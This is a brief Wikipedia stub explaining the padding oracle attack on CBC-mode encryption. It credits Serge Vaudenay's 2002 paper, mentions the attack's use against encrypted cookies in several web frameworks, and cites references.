Padding oracle attack

In cryptography, the padding oracle attack is an attack on the CBC mode of operation, where the "oracle" (usually a server) leaks data about whether the padding of an encrypted message is correct or not. This can allow attackers to decrypt (and sometimes encrypt) messages through the oracle using the oracle's key, without knowing the encryption key.

The original attack was published in 2002 by Serge Vaudenay.^[1] Recently it has been applied to encrypted cookies in several web application frameworks, including JavaServer Faces, Ruby on Rails^[2] and ASP.NET.^[3]

References

^ Serge Vaudenay (2002). Security Flaws Induced by CBC Padding Applications to SSL, IPSEC, WTLS... (PDF). EUROCRYPT 2002.
^ Juliano Rizzo, Thai Duong (5 February 2010). Practical Padding Oracle Attacks Against Web Applications. Black Hat Europe 2010.
^ Dennis Fisher (13 September 2010). "'Padding Oracle' Crypto Attack Affects Millions of ASP.NET Apps". Threat Post.

This cryptography-related article is a stub. You can help Wikipedia by expanding it.

[1] Serge Vaudenay (2002). Security Flaws Induced by CBC Padding Applications to SSL, IPSEC, WTLS... (PDF). EUROCRYPT 2002.

[2] Juliano Rizzo, Thai Duong (5 February 2010). Practical Padding Oracle Attacks Against Web Applications. Black Hat Europe 2010.

[3] Dennis Fisher (13 September 2010). "'Padding Oracle' Crypto Attack Affects Millions of ASP.NET Apps". Threat Post.

[1]

[2]

[3]